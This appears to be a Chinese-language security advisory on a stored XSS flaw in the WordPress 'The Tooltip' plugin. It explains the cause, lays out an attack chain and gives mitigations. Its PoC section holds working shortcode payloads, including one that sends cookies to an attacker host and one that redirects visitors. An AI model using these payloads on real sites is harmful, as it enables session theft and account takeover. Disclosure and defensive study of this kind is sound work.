CVE-2025-13908 WordPress The Tooltip插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13908

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

The Tooltip plugin for WordPress

漏洞概述

CVE-2025-13908是WordPress的The Tooltip插件中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞影响插件1.0.2及以下所有版本。漏洞根源在于插件的'the_tooltip'短代码对用户提供的属性缺乏充分的输入清理和输出转义处理。由于WordPress短代码机制的特性，恶意脚本会被永久存储在数据库中。当其他用户访问包含恶意短代码的页面时，注入的JavaScript代码会自动执行，可能导致会话劫持、敏感信息窃取、恶意重定向等安全问题。攻击者利用此漏洞需要具备WordPress网站贡献者级别(Contributor)或更高的用户权限，这降低了攻击门槛，使得内部恶意用户也能实施攻击。该漏洞CVSS评分为6.4，属于中等严重程度，但考虑到其存储型XSS的特性，实际危害可能更大。

技术细节

该漏洞源于The Tooltip插件在处理短代码属性时的安全缺陷。插件使用the_tooltip短代码接受用户输入，典型用法类似：[the_tooltip text='提示文本' link='链接']。然而，插件未对link属性进行充分的HTML实体转义，直接将用户输入嵌入到HTML锚点标签的href属性中。攻击者可以构造恶意载荷如：'[the_tooltip text='点击这里' link='javascript:alert(document.cookie)']'，其中JavaScript协议会被浏览器解析执行。当页面渲染时，恶意脚本被存储在WordPress数据库中，每次有用户访问该页面都会触发执行。问题代码位于the-tooltip.php文件第92行附近，该位置缺少htmlspecialchars()或类似函数的输出转义处理。修复方案需要在输出前对所有用户可控的属性进行htmlspecialchars($value, ENT_QUOTES, 'UTF-8')转义处理。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用的WordPress版本和The Tooltip插件，确认插件版本<=1.0.2

STEP 2

Authentication

攻击者获取WordPress Contributor级别账户权限，或通过社会工程学手段获取有效凭据

STEP 3

Payload Crafting

构造恶意短代码载荷，使用javascript:协议或事件处理器注入XSS代码

STEP 4

Injection

通过页面编辑、评论或REST API将恶意短代码插入WordPress文章/页面内容中

STEP 5

Persistence

恶意代码被存储在WordPress数据库的posts表中，实现持久化

STEP 6

Execution

当其他用户（管理员、编辑等）访问包含恶意内容的页面时，XSS payload自动执行

STEP 7

Impact

窃取用户会话Cookie、凭据，劫持管理员账户，或进行进一步内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13908 PoC: Stored XSS via the_tooltip shortcode -->
<!-- Author: Security Researcher -->
<!-- Target: The Tooltip plugin for WordPress <= 1.0.2 -->

<!-- Basic PoC - Inject malicious JavaScript -->
[the_tooltip text='Malicious Link' link='javascript:alert(document.domain)']

<!-- Steal cookies/session -->
[the_tooltip text='Click Here' link='javascript:fetch("https://attacker.com/steal?c="+document.cookie)']

<!-- Deface page - redirect users -->
[the_tooltip text='Important Update' link='javascript:window.location.href="https://malicious-site.com"']

<!-- XSS payload with event handler -->
[the_tooltip text='<img src=x onerror=alert(1)>' link='https://legit-site.com']

<!-- WordPress REST API exploitation (requires Contributor role) -->
<!-- POST /wp-json/wp/v2/posts/{id} -->
<!-- Body: {"content": "[the_tooltip text='XSS' link='javascript:alert(1)']"} -->

影响范围

The Tooltip plugin for WordPress <= 1.0.2

防御指南

临时缓解措施

立即禁用或删除The Tooltip插件，直到官方发布安全更新。同时，限制WordPress用户的贡献者角色权限，禁止其编辑页面内容。对所有用户输入实施严格的内容安全策略(CSP)头，配置'Content-Security-Policy: script-src 'self''以阻止内联脚本执行。启用WordPress的自动更新功能，确保插件及时获得安全补丁。